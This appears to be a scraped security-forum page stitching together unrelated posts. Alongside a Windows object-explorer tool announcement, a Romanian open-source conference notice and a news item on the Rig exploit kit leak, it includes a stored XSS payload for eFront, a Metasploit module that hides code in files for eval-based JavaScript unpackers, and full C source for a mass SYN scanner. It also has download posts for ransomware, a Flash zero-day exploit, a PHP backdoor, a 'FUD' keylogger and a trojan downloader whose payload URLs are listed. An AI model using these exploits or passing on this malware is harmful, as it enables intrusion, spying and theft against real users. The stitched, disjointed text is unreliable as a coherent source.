Search the Community

Windows Object Explorer 64-bit (WinObjEx64) WinObjEx64 is an advanced utility that lets you explore the Windows Object Manager namespace. For certain object types, you can double-click on it or use the "Properties..." toolbar button to get more information, such as description, attributes, resource usage etc. WinObjEx64 let you view and edit object-related security information if you have required access rights. System Requirements WinObjEx64 does not require administrative privileges. However administrative privilege is required to view much of the namespace and to edit object-related security information. WinObjEx64 works only on the following x64 Windows: Windows 7, Windows 8, Windows 8.1 and Windows 10, including Server variants. WinObjEx64 does not work on Windows XP, Windows Vista is partially supported. We have no plans of their full support. In order to use all program features Windows must be booted in the DEBUG mode. Build WinObjEx64 comes with full source code. In order to build from source you need Microsoft Visual Studio 2013 U4 and later versions. Authors © 2015 WinObjEx64 Project Original WinObjEx © 2003 - 2005 Four-F Acknowledgements We would like to thanks the following people for their contributions (in the alphabetical order): Andrew Ivlev aka Four-F - author of the original x86-32 WinObjEx Giuseppe Bonfa aka Evilcry - KDSubmarine author Mark Russinovich - author of the original proof-of-concept tool WinObj Microsoft WinDBG developers team Source and compiled binary here https://github.com/hfiref0x/WinObjEx64 Project files SHA1: https://github.com/hfiref0x/WinObjEx64/blob/master/Source/SHA1.hash Copy: 818bf9f0d4189347e9bd157a2810615109423e62 *Release\WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *Release\WinObjEx64.exe 6f4df146c341d7f2dafbe5e3d1aee5f2c7b3488b *WinObjAdv\aboutDlg.c d0e500c0092000d73fd711a5d20c35b69f4ac447 *WinObjAdv\aboutDlg.h 74fcc74b3d7d7a4467869a888dcd4f67797ca156 *WinObjAdv\excepth.c 2ba8ded754090338b733797accdb696162866e75 *WinObjAdv\excepth.h fbad8de8cbc2eb1ed7612a495ac5e0206210d241 *WinObjAdv\findDlg.c 68449112b665b763729ef78fec2d7e2dd2bca653 *WinObjAdv\findDlg.h 08f9599cc724cda5a8148a09dc31655e1eefe345 *WinObjAdv\global.h 80c6e0253371e8debbf7389ffe954231ad5bf705 *WinObjAdv\instdrv.c 2a943159f01da7516f1a49c5bd1407a69835bbce *WinObjAdv\instdrv.h 0f68ede96ad12ad93f594525b98b3daf25e2383a *WinObjAdv\kldbg.c 1892a89b673214b71d08854f39ee55342ae72c88 *WinObjAdv\kldbg.h 37814686c9a82fdfdc568f2759cea117fc2a9952 *WinObjAdv\list.c f26030f75546ec594fd5a87ee2fc82796480599d *WinObjAdv\list.h 9f98dd38d9b13f7572f59589973d3033d7d34fcb *WinObjAdv\main.c e9cf1468a3ebcb67fcea1b86730a25e6669b096b *WinObjAdv\minirtl.c 500a94a62e9ba78c38833670302537cf6fb0e3d0 *WinObjAdv\minirtl.h ef02d79e830000af6efbd0cb527eaa7a60efa917 *WinObjAdv\ntos.h 4c1698b624baaa52f6b2ff2c536b9df644e52820 *WinObjAdv\obex.manifest 92c7dfb2face6bc570fb63ee123702ebf30764f4 *WinObjAdv\propBasic.c ff406cb1a50504533e367eca67e759f044ddd5ab *WinObjAdv\propBasic.h a00e7fa470faad601bde2219e596c20c2294acd0 *WinObjAdv\propBasicConsts.h 4328cb76fcb70930fe8be27e7c89ad768273224f *WinObjAdv\propDesktop.c cf5e6d7616c776aff3bcf6ec7698fb18bfd76950 *WinObjAdv\propDesktop.h 9364e13a1eb1c2c8062ce1002fcbf7d5dfba344c *WinObjAdv\propDlg.c bdc4258b60a8c512c487cfd6c726caa0ff3b0976 *WinObjAdv\propDlg.h 72cb46536bd855f9ee2b6be32bd097ec48267909 *WinObjAdv\propDriver.c d4bf75d244002db8da4cd5314ea757896bbcbd3e *WinObjAdv\propDriver.h b72b9ee8ccfbbd78844548e40d6bebf42d497a67 *WinObjAdv\propDriverConsts.h a82596fc8914f384049c68469eb45c0468866c44 *WinObjAdv\propObjectDump.c df95b45770b80b5e88fd5cfea593eb51790222a2 *WinObjAdv\propObjectDump.h f4de0f1071031d2ae108a683ca9deb5066a9f3a3 *WinObjAdv\propObjectDumpConsts.h 1e3d3e0747dd2bf464f9351018309e78fe02870e *WinObjAdv\propProcess.c 4a050a42f7bf083fafe23f0fe94bf34d45287559 *WinObjAdv\propProcess.h 0325abb4e9bf8867eea50fdb7f508b010d702d70 *WinObjAdv\propSecurity.c ac8356ce68b06cbd917bd54ed463d3ea15f06856 *WinObjAdv\propSecurity.h aefd3c0d9ea1a5506cafa3425fbb6128aab132d4 *WinObjAdv\propSecurityConsts.h 7513279bf1104150e0a1608176b899f2b5073fa3 *WinObjAdv\propType.c b01ee5835191e2e2e47106630f5f42fcab789b92 *WinObjAdv\propType.h 565a332243f0beb23970bf4e0180c9607bd7a246 *WinObjAdv\propTypeConsts.h 21028096ddc34328c1c098ca3de2de59aa6e9075 *WinObjAdv\resource.h 4d063a98918873efcc86682d31c18aeb821e2367 *WinObjAdv\Resource.rc f2c93d88f1a5dbfa8cafa1c31e02c866dc975371 *WinObjAdv\rsrc\100.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\101.ico fd979dd62fdbeba6298ac1dabbc678fe0dbb0ae5 *WinObjAdv\rsrc\102.ico c16779a0fef28aab679eda6c18e7c6f5e68a5c20 *WinObjAdv\rsrc\103.ico bcd4d1222ebdcf1545209451c5247cb61549ec23 *WinObjAdv\rsrc\104.ico a0b22a0e9ab1401926aef939df99acc1a7a7d9ad *WinObjAdv\rsrc\105.ico e94d7aad576eccad0d8d8c52249700230dab76c8 *WinObjAdv\rsrc\106.ico 824001cd7bae24b7217b075d32da7618c93bdd00 *WinObjAdv\rsrc\107.ico c5c1a26d3e2bab8086d663ce2326f476e73f0f08 *WinObjAdv\rsrc\108.ico 65f8d9d565b00930920fbff580c87d399b90f9cc *WinObjAdv\rsrc\109.ico 56c27e823eb044da4d7726f0d35d98822bd79344 *WinObjAdv\rsrc\110.ico 08b8573a1efd1803099698a011f3c3d6eb00d3da *WinObjAdv\rsrc\111.ico f9ea074c8c152d30af74f4b266ab80aaf10a2821 *WinObjAdv\rsrc\112.ico 13e524fbc7b803ab711e11fb61f1014641cff8b6 *WinObjAdv\rsrc\113.ico 69a5a4ed71a85e99b4806563a2739d7de5dc2e38 *WinObjAdv\rsrc\114.ico 3a9b58b48fd4dfcb356abfd915036d7195c3c29c *WinObjAdv\rsrc\115.ico 335fd760d495b9a68ccafbcfb52f4f1ddc90b3fc *WinObjAdv\rsrc\116.ico 2d9b7e5622ef1c6f96cf85d344a989df7d129530 *WinObjAdv\rsrc\117.ico aa221c069f9a53f9afa7fbccb4465ce4da6baf58 *WinObjAdv\rsrc\118.ico 530ac9c2d277d9908decb955618ab2b43995cd1f *WinObjAdv\rsrc\119.ico 4ef03bb6bbc10b1723770a03b6fd899d3be1044a *WinObjAdv\rsrc\120.ico d84cd22bab028700050a644be5c2a7dafcc4553a *WinObjAdv\rsrc\121.ico 557be784a62110a81aa0f4b620c210e165857905 *WinObjAdv\rsrc\122.ico 674f4875596c907ee8da940edff1e98401e8b7fa *WinObjAdv\rsrc\123.ico 041a38d1522858aaede0df6d42b2479c8300c988 *WinObjAdv\rsrc\124.ico c0832fe5bf96f11a8133bbed66449574a3fd9089 *WinObjAdv\rsrc\125.ico 0a2aeedde4dc3934e28d727396c1ff93fddf6a6e *WinObjAdv\rsrc\126.ico 56d12ceb51825d502ba3a096396404af56b8f817 *WinObjAdv\rsrc\127.ico b7c0bf31dd02382e151e4d62fc078bc292303ff9 *WinObjAdv\rsrc\128.ico 267f398bd643e7c1591412b2c7538b79e1159ca9 *WinObjAdv\rsrc\129.ico 1be3fd5b055f60b2c2357e9cb87dddad22542a95 *WinObjAdv\rsrc\130.ico 8b725d0d5552061a6cd88e17eda3d580c4fa7fde *WinObjAdv\rsrc\131.ico 9e89e0564daacd2bb36f906e4754d3a3b95141d7 *WinObjAdv\rsrc\132.ico f57a70dbb02c43ffcf8b6d028f775606a2be5d91 *WinObjAdv\rsrc\133.ico 863ce1668eccc967273a8fbaff5e29db81d4d047 *WinObjAdv\rsrc\134.ico d9bb1b62d374b1cfb0892d5e1437342701db2a1f *WinObjAdv\rsrc\135.ico 8c64531a70ad2bf61c050fd1e69a9d7e87549c35 *WinObjAdv\rsrc\136.ico 34356dcf20c4dd0adc3d363d25dcd7ed4e98bfa9 *WinObjAdv\rsrc\137.ico 656ccfe0b2a147b61b16321e14516e0c2dccbd57 *WinObjAdv\rsrc\138.ico 1721fe712b75808604318f015c09f6b2b469baf7 *WinObjAdv\rsrc\6001.ico 68b25362609b6db97c40b375e2497e2db4f5ee48 *WinObjAdv\rsrc\6002.ico 8f4a9ec169d9c6e80ae2a8ee1947dab63665337d *WinObjAdv\rsrc\Bitmap_125.bmp 6f5b29fffb021bf80ca91d6d67cfc019d63f7175 *WinObjAdv\rsrc\kldbgdrv.sys da3fa9f3a72da9bde1d73dd4b5f7d93b909fe3d6 *WinObjAdv\sup.c 38c463dcf6a834eea357bc766135dfa5210ba99c *WinObjAdv\sup.h 09ca1ed7f052113f24bf2f11c877538b772701a3 *WinObjAdv\supConsts.h e87a6e82d41f9b065e58fdc5a2acf362ca6969cb *WinObjAdv\treelist.c 7d5d97dcc923a87d5f6064fe1b9fdba5e04674fe *WinObjAdv\treelist.h a99d9f26e6df31641a6780993b96b76d0e0ce088 *WinObjAdv\ui.h e78a55a5c4a562c54d77b16f24b88c42fd6b3816 *WinObjAdv\WinObjAdv.vcxproj e9ba01dd003e20ab20191dabbebde20921abe3f6 *FILELIST.txt 5eedad7ce5b95dd191d1556072481e18295676fd *README.md 0d66462034a77394dc5272acdb8d13758f448b19 *TODO.txt 16ee9f3cf034a76595910177b911832de6a4081c *WinObjAdv.sln In attach compiled version. SHA1 818bf9f0d4189347e9bd157a2810615109423e62 *WinObjEx64.chm 957157318a64482f446b97c82afe786444b1b2ff *WinObjEx64.exe Copyrights WinObjEx64 developed by WinObjEx64 Project group, in the alphabetical order: EP_X0FF MP_ART This program uses Windows Debugger Local Kernel Debugging Driver © Microsoft Corporation. Please use this thread for bugreports. Also take a note that Windows 10 is supported *AS IS* since it wasn't released yet, official support will be added after official release. Download Source

# Affected software: efrontlearning # Type of vulnerability: stored xss # URL: http://demo.efrontlearning.net/ # Discovered by: Provensec # Website: http://www.provensec.com # Description: Open Source e-Learning # Proof of concept #version:eFront 3.6.11 goto addd new category http://demo.efrontlearning.net/enterprise/www/administrator.php?ctg=directions and add new with xss payload "><img src=d onerror=confirm(1);> and save it payload will execute #screen:http://prntscr.com/69zhge Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::JSObfu def initialize(info = {}) super(update_info(info, 'Name' => 'Javascript Injection for Eval-based Unpackers', 'Description' => %q{ This module generates a Javascript file that executes arbitrary code when an eval-based unpacker is run on it. Works against js-beautify's P_A_C_K_E_R unpacker. }, 'Author' => [ 'joev' ], 'License' => MSF_LICENSE, 'References' => [ ], 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS, 'Privileged' => false, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Feb 18 2015', 'DefaultTarget' => 0)) register_options([ OptString.new('FILENAME', [true, 'The file name.', 'msf.js']), OptString.new('CUSTOM_JS', [false, 'Custom Javascript payload.']) ], self.class) end def exploit p = js_obfuscate(datastore['CUSTOM_JS'] || payload.encoded); print_status("Creating '#{datastore['FILENAME']}' file...") file_create("eval(function(p,a,c,k,e,r){}((function(){ #{p} })(),''.split('|'),0,{}))") end end Source

Pe 4 martie 2015, pasionatii de tehnologii open source vor face schimb de experienta si vor relationa in cadrul unei conferinte tehnice dedicate Brian King, European Community Manager al Mozilla, este cap de afis la conferinta Make Open Source Software (MOSS) organizata de ANIS – Asociatia Patronala a Industriei de Software si Servicii, in colaborare cu Intel Romania Software Development Center. Evenimentul are loc la Biblioteca Centrala din Universitatea Politehnica Bucuresti, pe 4 martie. Timp de o zi, dezvoltatori, manageri de echipe sau proiecte, studenti si profesori interesati de tehnologiile open source sunt asteptati sa ia parte la prezentari si discutii tehnice aprofundate despre masini virtuale, Internet of Things, implementari la scara larga prin Puppet Labs, studii de caz concrete despre scalabilitatea in Azure Cloud si demonstratii live. Agenda detaliata este disponibila pe site-ul evenimentului – Agenda – MOSS. “Suntem bucurosi sa organizam conferinta Make Open Source Software, in parteneriat cu Asociatia Patronala a Industriei de Software si Servicii. Va fi un prilej bun de a-i aduce laolalta pe profesionistii din sfera Open Source din Romania”, a declarat Mihai Constantin-Pau, Engineering Manager, Intel Open Source Technology Center din cadrul Intel Romania Software Development Center. La eveniment va sustine o prezentare despre debutul open source in Romania si dezvoltarea GNU Interactive Tools – Andrei Pitis, Presedinte ANIS si unul dintre primii contribuitori open source din Romania, acum 20 de ani. Studentii beneficiaza de o reducere de 50%, fiind incurajati sa interactioneze in comunitate, iar pentru companiile care doresc inscrierea mai multor persoane sunt disponibile pachete de grup cu discount. Biletele se pot achizitiona online, direct de pe site: Register – MOSS. -> Sursa: http://www.faravirusi.com/2015/02/20/18062/

Another generic ransomware. Blog: Blaze's Security Blog: Yet another ransomware variant Attached: 88039ecb68749ea7d713e4cf9950ffb2947f7683 7e1dd704684f01530307f81bbdc15fe266ffd8db DOWNLOAD Source

Scam can be found at: hxxp://vikingwebscanner.com/ron2/adw/ executable attached Link download: HERE Pass: infected Source

A spitting match between developers of the Rig Exploit Kit and one of its resellers resulted in a partial leak of the kit’s source code in a hacker forum. Rig is less than a year old and is spread primarily in malvertising campaigns, pushing Flash, Java and Microsoft Silverlight exploits; some versions also push ransomware. Experts, however, aren’t sure this will give birth to a rash of campaigns centered on Rig. “I do not think this will be really noticeable,” said French exploit kit researcher Kafeine, who found the leak being advertised on a hacker board. He said the main pushers of Rig do no operate on the same forum. “Following this leak, the crooks might get cold feet and try to stay under the radar to elude law enforcement’s attention,” said a report posted yesterday by researchers at Trustwave SpiderLabs. “As a result we’d expect to see less activity. On the other hand, script kiddies may now use this source code to try and deploy their own infection schemes for quick and easy profit.” A U.K. researcher known as MalwareTech said the leaker is likely a Rig Exploit Kit reseller who tried to scam potential buyers by charging prices 40 percent higher than “official” Rig sellers, as well as asking $3,000 for access to a private forum that did not exist, according to screenshots from his website. “It seems like the RIG owner was less than pleased with the reseller’s antics because the next day, in a conversation with another member, the owner declared that he had suspended the reseller for attempting to scam customers, which isn’t surprising given he was requesting that people pay him $3000 for access to an imaginary private forum,” MalwareTech wrote on his website. No honor among thieves. Undaunted, the reseller took to Twitter creating an account that riffed on researchers from Malware Must Die. In a series of tweets, the reseller said he was in possession of Rig source code and a database dump; he also provided a download link. MalwareTech said the password-protected file was deleted after a couple dozen downloads. He said, however, that he confirmed the leak was legitimate with three other sources. The leak, however, is incomplete and it appears the reseller leaked only files he had access to, Trustwave SpiderLabs said. “In addition to parts of the source code, the contents of the leak included a partial export of the server database,” Trustwave said. Its researchers thus had access to infection stats and saw only about 1,200 since the leak. Sursa

Flash exploit from Angler Exploit Kit. Analyzing CVE-2015-0313 - The New Flash Player Zero Day https://www.trustwave.com/Resources/SpiderLabs-Blog/A-New-Zero-Day-of-Adobe-Flash-CVE-2015-0313-Exploited-in-the-Wild Download Pass: infected Source

PHP backdoor, not that interesting but might occur more in the future. Reference: https://www.htbridge.com/blog/ransomweb_emerging_website_threat.html Download Source

[C++] Fud Keylogger Source Code Dir list: 08/09/2014 15:34 <DIR> . 08/09/2014 15:34 <DIR> .. 04/03/2014 16:54 9,407 Logger.cpp 03/03/2014 10:30 653 Logger.h 20/02/2014 14:23 156 LogType.h 04/03/2014 15:43 1,895 mpkhook.cpp 23/02/2014 14:31 4,413 mpkhook.vcxproj 23/02/2014 14:31 1,455 mpkhook.vcxproj.filters 20/02/2014 13:18 143 mpkhook.vcxproj.user 23/02/2014 12:22 197 save.txt 04/03/2014 16:45 1,428 SaveToFile.cpp 03/03/2014 10:44 349 SaveToFile.h 11 File(s) 20,096 bytes 2 Dir(s) 18,466,537,472 bytes free password arhive: MPLogger67584 Download: http://uppit.com/ogtrkmleh1np/MPLogger.rar source: opensc

Virus Total Scan: https://www.virustotal.com/pl/file/1af1416a7c15765d6b483f4900892ccefef54d545dd0e5754921f4991f9a252f/analysis/1421698835/ Download Pass: infected It is trojan downloader Win32/Dalexis breteau-photographe.com/tmp/pack.tar.gz voigt-its.de/fit/pack.tar.gz maisondessources.com/assets/pack.tar.gz jbmsystem.fr/jb/pack.tar.gz pleiade.asso.fr/piwigotest/pack.tar.gz scolapedia.org/histoiredesarts/pack.tar.gz Unpacked Download unpacked Source

vFeed framework is an open source naming scheme concept that provides extra structured detailed third-party references and technical characteristics for a CVE entry through an extensible XML schema. It also improves the reliability of CVEs by providing a flexible and comprehensive vocabulary for describing the relationship with other security references and standards Download: https://github.com/toolswatch/vFeed

/* This is a fast and portable (i think). 48 bytes syn, w2k emulation, we are still working on it, drop an email to xx@xx if something goes wrong. libnet and libpcap is required, the options are pretty self explanatory, stripped static binary included for lamers. */ #include <libnet.h> #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/types.h> #include <unistd.h> #include <pcap.h> #include <time.h> int main(int argc, char **argv) { libnet_t *l; libnet_ptag_t t; unsigned short burst=50; unsigned short ct=0; char errbuff[LIBNET_ERRBUF_SIZE]; unsigned long myip; struct in_addr sc; unsigned char tcpopt[]="\x02\x04\x05\xb4\x01\x01\x04\x02"; unsigned short port; unsigned long usec; //unsigned char outstr[1024]; char cc; int i; pid_t pid; pcap_t *handle; char *temp_char; bpf_u_int32 mask; bpf_u_int32 net; char errbuf[PCAP_ERRBUF_SIZE]; char filter[1024]; struct bpf_program cfilter; struct pcap_pkthdr header; const unsigned char *packet; struct in_addr ekkt; unsigned char ip[50]; unsigned long dstip=0; unsigned short sport; char *interface=NULL; unsigned char bclass=0; unsigned char aclass=0; unsigned char rclass=1; unsigned int a=0,b=0,c=0,d=0; srand(time(NULL)); sport=rand(); usec=1000000; if(argc<2) { printf("usage: %s <port> [-a <a class> | -b <b class>] [-i <interface] [-s <speed>]\n",argv[0]); printf("speed 10 -> as fast as possible, 1 -> it will take bloody ages (about 50 syns/s)\n"); exit(0x01); } for(i=1;i<argc;i++) { if(strstr(argv[i],"-s")) { if(i+1<argc) { switch (atoi(argv[i+1])) { case 1:usec=1000000;break; case 2:usec=500000;break; case 3:usec=250000;break; case 4:usec=125000;break; case 5:usec=60000;break; case 6:usec=30000;break; case 7:usec=10000;break; case 8:usec=1000;break; case 9:usec=100;break; case 10:usec=0;burst=65535; } } else { printf("-s requires an argument\n"); exit(0x01); } } if(strstr(argv[i],"-i")) { if(i+1<argc) interface=argv[i+1];else { printf("-i requires an argument\n"); exit(0x01); } } if(strstr(argv[i],"-a")) { if(i+1<argc) { aclass=1; bclass=0; rclass=0; a=atoi(argv[i+1]); b=0; c=0; d=0; //printf("%d\n",a); if((a<1) || (a>254)) { printf("A must be between 1 and 254\n"); exit(0x02); } printf("scanning network %d.*.*.*\n",a); } else { printf("-a requires an A network as argument\n"); exit(0x01); } } if(strstr(argv[i],"-b")) { if(i+1<argc) { aclass=0; bclass=1; rclass=0; a=atoi(strtok(argv[i+1],".")); temp_char=strtok(NULL,"."); if(temp_char==NULL) b=0;else b=atoi(temp_char); c=0; d=0; //printf("%d\n",a); if((a<1) || (a>254)) { printf("A must be between 1 and 254\n"); exit(0x02); } printf("scanning network %d.%d.*.*\n",a,; } else { printf("-b requires an B network as argument(e.g. 192.168)\n"); exit(0x01); } } } printf("usec: %ld, burst packets %d\n",usec,burst); port=(unsigned short)atoi(argv[1]); if((port<1) || (port>65535)) exit(printf("damn dude, port numbers are in 1 .. 65535\n")); if(interface!=NULL) printf("using inteface %s\n",interface); l=libnet_init(LIBNET_RAW4,interface,errbuff); if(!l) { printf("ERROR: %s\n",errbuff); exit(0x02); } myip=libnet_get_ipaddr4(l); sc.s_addr=myip; sprintf(filter,"(tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)",port,sport); printf("using \"%s\" as pcap filter\n",filter); printf("my detected ip on %s is %s\n",l->device,inet_ntoa(sc)); pcap_lookupnet(l->device, &net, &mask, errbuf); pid=fork(); handle=NULL; handle = pcap_open_live(l->device, BUFSIZ, 1, 0, errbuf); if(handle==NULL) { printf("ERROR: pcap_open_live() : %s\n",errbuff); exit(0x05); } cc=pcap_compile(handle, &cfilter, filter, 0, net); if(cc!=0) { printf("ERROR: pcap_compile() failed!!!\n"); exit(0); } cc=pcap_setfilter(handle, &cfilter); if(cc!=0) { printf("ERROR: pcap_setfilter() failed!!!\n"); exit(0); } if(pid==0) { /* sniff */ while(1) { packet = pcap_next(handle, &header); memcpy(&ekkt.s_addr,packet+26,4); printf("%s\n",inet_ntoa(ekkt)); FILE * fp; fp=fopen("bios.txt","a+"); fprintf(fp,"%s\n",inet_ntoa(ekkt)); fclose(fp); } } if(pid > 0) { printf("capturing process started pid %d\n",pid); usleep(500000); while(1) { t=LIBNET_PTAG_INITIALIZER; t=libnet_build_tcp_options(tcpopt, 8, l,0); //t=LIBNET_PTAG_INITIALIZER; t=libnet_build_tcp(sport,port,rand(),rand(),TH_SYN,65535,0,0,LIBNET_TCP_H+8,NULL,0,l,0); if(rclass) dstip=rand(); if(aclass) { if(d==0) printf("scanning %d.%d.%d.*\n",a,b,c); d++; if(d>255) {c++;d=0;} if(c>255) {b++;c=0;} sprintf(ip,"%d.%d.%d.%d\n",a,b,c,d); //printf("%s\n",ip); if((b==255)&& (c==255) && (d==255)) { printf("aici trebuie stop\n"); sleep(10); kill(pid,2); return 0; } sc.s_addr=inet_addr(ip); dstip=sc.s_addr; } if(bclass) { if(d==0) printf("scanning %d.%d.%d.*\n",a,b,c); d++; if(d>255) { c++;d=0; } sprintf(ip,"%d.%d.%d.%d",a,b,c,d); if((c==255) && (d==255)) { printf("%s\n",ip); printf("aici trebuie stop\n"); sleep(10); kill(pid,2); return 0; } sc.s_addr=inet_addr(ip); dstip=sc.s_addr; } libnet_build_ipv4(LIBNET_TCP_H+LIBNET_IPV4_H+8,0,rand(),0,128,IPPROTO_TCP,0,myip,dstip,NULL,0,l,0); cc=libnet_write(l); if(cc<=0) printf("libnet_write() wtf %d\n",cc); libnet_clear_packet(l); if(ct==burst) { usleep(usec); ct=0; }; ct++; } } if(pid<0) { printf("cannot fork()\n"); exit(0x05); } return 0; } http://www.sendspace.com/file/2mpuym http://pastebin.com/CcVLQjTU